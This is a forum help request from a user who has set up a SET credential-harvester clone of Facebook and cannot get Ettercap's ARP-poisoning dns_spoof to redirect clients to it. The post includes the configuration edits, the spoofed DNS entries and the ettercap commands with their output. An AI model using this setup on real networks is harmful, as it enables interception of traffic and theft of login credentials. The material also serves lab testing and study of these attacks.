Distro: BT5 R3 , VM: VMware

Hey guys. I've been testing Ettercap/SET on my own personal network and I've ran into a problem: Ettercap doesn't seem to want to redirect the DNS spoof.

SET seems to be working great:
Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner
Then I get prompted with:
IP address for the POST back in Harvester/Tabnabbing
So I enter wlan0's IP address (

If I go on another computer on the network and navigate to it works great. It looks just like Facebook and it even displays the POST results:

[*] WE GOT A HIT! Printing the output:
The issue I'm having is with ettercap. I'll walk you through the steps I did:
gedit /etc/etter.conf

Then I verified that I changed ec_uid and ec_gid's values to 0 as well as removing the # before the re_dir lines under ip_tables:

ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
I went ahead and did the same thing for /usr/local/etc/etter.conf

Next I cleared out the etter.dns file and put the following (/usr/local/share/ettercap/etter.dns):

HTML Code:
facebook.com A
*.facebook.com A
www.facebook.com PTR
Finally I started ettercap
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

Whenever I try to navigate to facebook.com on a Client in my network, it actually directs to Facebooks page (https://www.facebook.com) as opposed to my SET clone ( I tried changing it from facebook to other sites as well and nothing seems to get ettercap to redirect traffic. Again though, if I navigate to on a machine on the network, it WILL go to the SET clone page and work correctly.

I wanted to verify that I wasn't making any simple mistakes again, so I double checked to make sure I was on the subnet (even though I knew I already was);

arp-scan -interface wlan0 --localnet
Interface: wlan0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)    00    (Unknown)      (Unknown)  (Unknown)    (Unknown)    (Unknown)      (Unknown) (DUP: 2)    4    (Unknown) (DUP: 2)    (Unknown) (DUP: 2)    (Unknown) (DUP: 2)
I verified that all of the etter.conf and the etter.dns files were correct and reflect what I posted. I even tried manually adding the gateway IP instead of just using // // , as well as using the autoadd as opposed to dns_spoof

ettercap -Tqi wlan0 -M arp:remote // / -P autoadd
ettercap copyright 2001-2011 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 ->    XX:XX:XX:XX:XX:XX

Privileges dropped to UID 0 GID 0...

  28 plugins
  40 protocol dissectors
  55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

Activating autoadd plugin...
Just like before, it's producing the same result. It's not performing an actual DNS spoof to any client on the network, however, if a client was to navigate to ("attacker") it works correctly. Any other ideas by chance? I've been trying to research this and doing different methods but I keep running into the same issue. Thanks guys, I really appreciate your time!